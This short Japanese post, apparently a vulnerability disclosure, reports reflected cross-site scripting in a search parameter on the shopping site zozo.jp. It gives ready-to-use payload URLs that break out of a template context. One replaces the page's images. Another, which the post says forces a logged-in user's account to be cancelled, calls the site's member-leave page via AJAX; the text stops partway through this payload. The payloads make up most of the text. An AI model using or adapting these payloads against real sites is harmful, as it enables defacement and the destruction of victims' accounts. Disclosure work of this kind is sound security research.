以下のようなURLでXSSができた。 http://zozo.jp/search/?sex=kids&dstk='}}; (JavaScript); {{' 画像↑のXSSは以下のような感じでできた。 http://zozo.jp/search/?sex=kids&dstk='}};$('img').attr('src', 'https://www.google.co.jp/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png');{{' ログイン中に踏んだら強制退会できたXSS↓ http://zozo.jp/search/?sex=kids&dstk='}}; $.ajax({ type: 'GET', url: 'http://zozo.jp/_member/leave/default.html?', success: